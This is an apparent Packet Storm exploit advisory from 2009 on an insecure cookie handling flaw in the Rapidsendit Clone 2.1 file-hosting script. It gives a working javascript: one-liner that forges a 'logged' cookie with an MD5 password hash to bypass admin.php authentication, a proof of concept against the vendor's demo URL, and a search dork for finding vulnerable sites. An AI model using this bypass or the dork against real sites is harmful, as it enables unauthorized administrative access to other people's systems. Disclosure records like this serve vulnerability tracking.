Rapidsendit Clone 2.1 Insecure Cookie

2009-07-08T00:00:00
ID PACKETSTORM:78996
Type packetstorm
Reporter NoGe
Modified 2009-07-08T00:00:00

Description

                                        
                                            `  
======================================================================================  
  
  
[o] Rapidsendit Clone 2.1 Insecure Cookie Handling Vulnerability  
  
Software : Rapidsendit Clone version 2.1  
Vendor : http://www.rapidsendit.com/  
Demo : http://www.rapidsendit.com/script/demo.html  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
======================================================================================  
  
  
[o] Vulnerable file  
  
admin.php  
  
  
  
[o] Exploit  
  
javascript:document.cookie="logged=[md5_password_hash]; path=/";  
  
  
  
[o] Proof of concept  
  
http://www.rapidsendit.com/script/demo/admin.php  
  
replace url above with this javascript  
  
javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";  
  
696d29e0940a4957748fe3fc9efd22a3 = password  
  
  
  
[o] Dork  
  
"Powered By Rapidsendit Clone"  
  
  
======================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org ]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang  
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
  
======================================================================================  
`